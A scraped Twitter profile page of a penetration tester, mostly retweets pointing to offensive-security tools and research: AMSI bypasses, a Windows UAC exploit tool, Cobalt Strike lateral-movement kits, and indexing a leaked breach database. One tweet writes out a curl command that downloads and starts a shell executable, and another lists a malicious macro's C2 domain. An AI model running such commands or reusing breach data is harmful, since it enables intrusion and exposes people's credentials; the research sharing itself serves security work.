Richard Davy

@rd_pentest

Penetration Tester. CREST CCT | OSCE | OSCP | OSWP

Vrijeme pridruživanja: studeni 2016.

Tweetovi

Blokirali ste korisnika/cu @rd_pentest

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rd_pentest

  1. Prikvačeni tweet
    10. svi 2019.

    Bypassing AMSI in Office 365 x64 x86 -

    Poništi
  2. proslijedio/la je Tweet
    prije 9 sati

    CVE-2019-1388 Microsoft Windows UAC Privilege Escalation Exploit Tool : HHUPD.exe () Ref :

    Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
    Poništi
  3. proslijedio/la je Tweet
    prije 21 sat
    Poništi
  4. proslijedio/la je Tweet
    prije 19 sati

    If you use the cs2modrewrite project to build your C2 redirector rules, it is now updated to support CS <=4.0 profiles (multi-variants).

    Poništi
  5. proslijedio/la je Tweet
    Poništi
  6. proslijedio/la je Tweet
    5. velj

    If you're waiting for CrackMapExec in python3, my friend did an amazing job porting this huge project in python3. His fork has been integrated in the last Kali release. You should definitely check that out ! 🔥

    Poništi
  7. proslijedio/la je Tweet

    Have a look at this paper, it's very nicely written and contains a lot of side knowledge. (CDpwn, some 0days around Cisco's CDP) (don't panic, it's L2 so you need to be on the network first)

    Poništi
  8. proslijedio/la je Tweet
    4. velj

    Adding a Backdoor to AD in 400 Milliseconds

    Poništi
  9. proslijedio/la je Tweet
    3. velj

    Holy shit. Researcher discovers that TeamViewer stores user passwords encrypted and finds the encryption key and initialization vector in the windows registry

    Poništi
  10. proslijedio/la je Tweet
    3. velj

    A tool for automating cracking methodologies through Hashcat from

    Poništi
  11. proslijedio/la je Tweet
    3. velj

    I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.

    Poništi
  12. proslijedio/la je Tweet
    1. velj

    Indexing leaked database in ElasticSearch😍 Small example using data from the BreachCompilation and the dashboard you can come up with in Kibana🛠️

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    31. sij

    MoveKit - Cobalt Strike lateral movement kit

    Poništi
  14. proslijedio/la je Tweet

    Here it is- I Flew Katie Hopkins to Prague to win a Fake Award.

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet

    Lady balls. Man balls. Odd balls. Testicular cancer is the most common form of cancer in males aged 15-45. 🙀 is raising awareness for testicular cancer. 95% of testicular cancers are curable.

    Poništi
  16. proslijedio/la je Tweet
    30. sij

    If you guys want an awesome Red Team cheatsheet check out this tweet, my friend made the linked post!

    Poništi
  17. proslijedio/la je Tweet
    28. sij

    ICYMI - released MoveKit and StayKit, a collection of aggressor scripts, .NET projects, and templates to enhance lateral movement and persistence on your engagements. Link: MoveKit: StayKit:

    Poništi
  18. proslijedio/la je Tweet
    28. sij

    .exe is the new .exe  -   Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info -

    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    27. sij

    I created this repo for the people who want to learn about windows logical privilege escalation bugs. You can contact me to add good article which I missed.

    Poništi
  20. proslijedio/la je Tweet
    27. sij

    another macro with safe landing (no susp child processes): c2: ssl.securelogonweb\.com, backdoor: cobaltstrike, persis:startupfolder, other:cactustorch, wmic+xsl

    Poništi
  21. proslijedio/la je Tweet
    27. sij

    If 's DotnetToJScript is blocked on newer versions of Windows or if it gets flagged by AMSI, you can use Excel automation via a COM object as an alternative to execute shellcode from JScript or VBScript w/o touching disk. PoC for x86 & x64 here:

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·